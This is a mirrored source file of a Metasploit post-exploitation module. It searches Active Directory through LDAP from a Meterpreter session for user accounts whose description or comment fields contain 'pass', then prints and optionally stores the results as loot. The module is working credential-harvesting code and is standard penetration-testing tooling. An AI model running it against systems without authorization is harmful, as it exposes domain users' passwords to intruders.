Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/windows/gather/enum_ad_user_comments.rb
19612 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  include Msf::Auxiliary::Report

8
  include Msf::Post::Windows::LDAP

9


10
  def initialize(info = {})

11
    super(

12
      update_info(

13
        info,

14
        'Name'	=> 'Windows Gather Active Directory User Comments',

15
        'Description' => %q{

16
          This module will enumerate user accounts in the default Active Domain (AD) directory which

17
          contain 'pass' in their description or comment (case-insensitive) by default. In some cases,

18
          such users have their passwords specified in these fields.

19
        },

20
        'License' => MSF_LICENSE,

21
        'Author' => [ 'Ben Campbell' ],

22
        'Platform' => [ 'win' ],

23
        'SessionTypes' => [ 'meterpreter' ],

24
        'References' => [

25
          ['URL', 'http://social.technet.microsoft.com/wiki/contents/articles/5392.active-directory-ldap-syntax-filters.aspx'],

26
        ],

27
        'Notes' => {

28
          'Stability' => [CRASH_SAFE],

29
          'SideEffects' => [],

30
          'Reliability' => []

31
        }

32
      )

33
    )

34


35
    register_options([

36
      OptBool.new('STORE_LOOT', [true, 'Store file in loot.', false]),

37
      OptString.new('FIELDS', [true, 'Fields to retrieve.', 'userPrincipalName,sAMAccountName,userAccountControl,comment,description']),

38
      OptString.new('FILTER', [true, 'Search filter.', '(&(&(objectCategory=person)(objectClass=user))(|(description=*pass*)(comment=*pass*)))']),

39
    ])

40
  end

41


42
  def run

43
    fields = datastore['FIELDS'].gsub(/\s+/, '').split(',')

44
    search_filter = datastore['FILTER']

45
    max_search = datastore['MAX_SEARCH']

46


47
    begin

48
      q = query(search_filter, max_search, fields)

49
      if q.nil? || q[:results].empty?

50
        return

51
      end

52
    rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e

53
      # Can't bind or in a network w/ limited accounts

54
      print_error(e.message)

55
      return

56
    end

57


58
    # Results table holds raw string data

59
    results_table = Rex::Text::Table.new(

60
      'Header' => 'Domain Users',

61
      'Indent' => 1,

62
      'SortIndex' => -1,

63
      'Columns' => fields

64
    )

65


66
    q[:results].each do |result|

67
      row = []

68


69
      result.each do |field|

70
        if field[:value].nil?

71
          row << ''

72
        else

73
          row << field[:value]

74


75
        end

76
      end

77


78
      results_table << row

79
    end

80


81
    print_line results_table.to_s

82


83
    if datastore['STORE_LOOT']

84
      stored_path = store_loot('ad.users', 'text/plain', session, results_table.to_csv)

85
      print_good("Results saved to: #{stored_path}")

86
    end

87
  end

88
end

89


90